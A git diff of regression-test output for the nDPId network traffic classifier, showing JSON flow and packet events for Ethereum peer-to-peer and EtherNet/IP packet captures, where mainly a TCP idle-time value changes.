+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1578508365701,"flow_last_seen":1578508365828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365223,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1275,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"191.234.162.198","src_port":56620,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1578508365094,"flow_last_seen":1578508365839,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1578508364924,"flow_last_seen":1578508365071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":2045,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.250.240.205","src_port":56638,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1578508364932,"flow_last_seen":1578508365309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":1315,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508364659,"flow_last_seen":1578508365043,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":1158,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364650,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365751,"flow_last_seen":1578508365853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1396,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508366005,"flow_last_seen":1578508366135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":1439,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365751,"flow_last_seen":1578508365853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1396,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508366005,"flow_last_seen":1578508366135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":1439,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364422,"flow_last_seen":1578508365065,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578508365592,"flow_last_seen":1578508365773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1832,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1578508366020,"flow_last_seen":1578508366101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508364522,"flow_last_seen":1578508365036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1241,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365009,"flow_last_seen":1578508365126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1578508364824,"flow_last_seen":1578508365152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":1388,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578508365592,"flow_last_seen":1578508365773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1832,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1578508366020,"flow_last_seen":1578508366101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508364522,"flow_last_seen":1578508365036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1241,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365009,"flow_last_seen":1578508365126,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1578508364824,"flow_last_seen":1578508365152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":1388,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","packets-captured":2000,"packets-processed":2000,"total-skipped-flows":0,"total-l4-data-len":86968,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":71,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":74,"total-idle-flows":74,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":432,"global_ts_msec":1578508366135} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2000/2000 diff --git a/test/results/ethernetIP.pcap.out b/test/results/ethernetIP.pcap.out index 727a6589b..0ce13ac1d 100644 --- a/test/results/ethernetIP.pcap.out +++ b/test/results/ethernetIP.pcap.out 
@@ -1,29 +1,29 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ethernetIP.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1352718180263} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7440000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1352718180263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1352718180263,"pkt":"AAC80WDaeOfR4AJeCABFAAB6cCZAAIAGAACNUQAKjVEAU8RjrxLdiI2HlJVDUVAY+XQbbAAAcAA6AAABAhAAAAAAGjkvAAAAAAAAAAAAAAAAAAoAAgChAAQACRM1ALEAJgDkagoCIAIkAQIABgASAEwCIHIkAADOBAABAEwCIHIkACw9BAABAA=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7440000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1352718180264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1352718180264,"pkt":"eOfR4AJeAAC80WDaCABFAAAowW9AAEAGXmGNUQBTjVEACq8SxGOUlUNR3YiN2VAQD8bOTwAAAAAAAI1R"} 
-02070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1352718180264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1258,"pkt_l4_len":1224,"thread_ts_msec":1352718180264,"pkt":"AAC80WDaeOfR4AJeCABFAATccChAAIAGAACNUQAKjVEAU8RjrxLdiI3ZlJVDUVAY+XQfzgAAcAAsAAABAhAAAAAAGzkvAAAAAAAAAAAAAAAAAAoAAgChAAQAChU1ALEAGACvuAoCIAIkAQEABABMAiByJAAEggYAAQBwADoAAAECEAAAAAAcOS8AAAAAAAAAAAAAAAAACgACAKEABAAFCzUAsQAmAHuyCgIgAiQBAgAGABIATAIgciQAGLcEAAEATAIgciQAvFQGAAEAcAAsAAABAhAAAAAAHTkvAAAAAAAAAAAAAAAAAAoAAgChAAQABg01ALEAGAAHpAoCIAIkAQEABABMAiByJAAEggYAAQBwAKoAAAECEAAAAAAeOS8AAAAAAAAAAAAAAAAACgACAKEABAABAzUAsQCWABkzCgIgAiQBCgAWACIALgA6AEYAUgBeAGoAdgCCAEwCIHIkAHR\/BwABAEwCIHIkANiMBAABAEwCIHIkAITEBAABAEwCIHIkAAznBQABAEwCIHIkABh0BwABAEwCIHIkADS+BgABAEwCIHIkABDjBAABAEwCIHIkADQ\/BgABAEwCIHIkADS8BQABAEwCIHIkADTGBgABAHAA4gAAAQIQAAAAAB85LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAIFNQCxAM4AoxkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABAoQYAAQBMAiByJADc\/QUAAQBMAiByJAD0hgUABgBMAiByJAAs5QUAAQBMAiByJACYFAcAAQBMAiByJACkkwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJABQpQUAAQBMAiByJABY4wQAAQBMAiByJAC4xwcAAwBMAiByJAC0zwQAAQBwACwAAAECEAAAAAAgOS8AAAAAAAAAAAAAAAAACgACAKEABAADBzUAsQAYAHenCgIgAiQBAQAEAEwCIHIkAGiiBwAJAHAAwgEAAQIQAAAAACE5LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAQJNQCxAK4Bf58KAiACJAEeAD4ASgBWAGIAbgB6AIYAkgCeAKoAtgDCAM4A2gDmAPIA\/gAKARYBIgEuAToBRgFSAV4BagF2AYIBjgGaAUwCIHIkAIx0BwABAEwCIHIkAKiiBwABAEwCIHIkAJg0BAABAEwCIHIkADgxBwABAEwCIHIkAChvBgABAEwCIHIkACiNBgABAEwCIHIkAAgQBgABAEwCIHIkANRpBwABAEwCIHIkAEB1BgABAEwCIHIkAPQcBgABAEwCIHIkAOwZBgABAEwCIHIkAIizBwABAEwCIHIkAOQgBgABAEwCIHIkAMgaBgABAEwCIHIkAGQ5BwABAEwCIHIkADi\/BgABAEwCIHIkACivBQABAEwCIHIkABwhBgABAEwCIHIkAEj1BQABAEwCIHIkAFT1BgABAEwCIHIkAAA8BgABAEwCIHIkAMRfBwABAEwCIHIkALCqBQABAEwCIHIkAKC1BgABAEwCIHIkAMT8BwABAEwCIHIkAMB
0BgABAEwCIHIkAEzoBwABAEwCIHIkAGguBAABAEwCIHIkAHyvBQABAEwCIHIkALwJBgABAA=="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1352718180265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180265,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1RAAEAGjEiNUQA\/jVEACq8SzXF9dCfmE+ef0VAYEACJaQAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAncYAgLEAHAAzNYoAAAACAAYADgDMAAAAAQAAAMwAAAAFAAAA"} 